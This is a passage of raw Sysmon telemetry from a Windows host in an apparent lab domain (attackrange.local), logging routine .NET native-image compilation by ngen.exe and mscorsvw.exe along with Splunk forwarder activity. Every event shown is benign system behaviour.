dll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.822{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-FC04-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.822{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-FC04-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:46.775{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1100-0\TaskScheduler.dll2021-06-23 21:06:46.775 10341000x800000000000000022222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.603{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.588{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.588{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-FB04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-FA04-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.416{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-FA04-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.416{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-FA04-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:46.354{4DB9351A-A266-60D3-F904-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\91c-0\System.Xml.Serialization.dll2021-06-23 21:06:46.354 10341000x800000000000000022215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.322{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-F904-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.307{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-F904-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.307{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-F904-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.244{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-F804-00000000CF01}3564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.213{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-F804-00000000CF01}3564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.213{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-F804-00000000CF01}3564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000022209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.299{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61455-false10.0.1.12-8000- 11241100x800000000000000022208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:46.135{4DB9351A-A266-60D3-F704-00000000CF01}2180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\884-0\System.Xaml.Hosting.dll2021-06-23 21:06:46.135 10341000x800000000000000022207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.025{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-F704-00000000CF01}2180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.995{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-F704-00000000CF01}2180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.995{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-F704-00000000CF01}2180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.963{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A267-60D3-0005-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.963{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A267-60D3-0005-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.963{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B40A9025945A8C20B3632A926E2B33AE,SHA256=AD79F0A482140F806D281459E4CCA64CBF648FBC62662AE0A5BED42F472716C5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:47.885{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14f4-0\UIAutomationClientsideProviders.dll2021-06-23 21:06:47.885 23542300x800000000000000022309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.744{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92EE5FCA9DFECE041CFDEDF3CC2F880D,SHA256=2494525D05C5B2BA1F8AD7AE43E210DA07C9A083B4479E0E11B18F303FFCC3EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.697{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000022307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 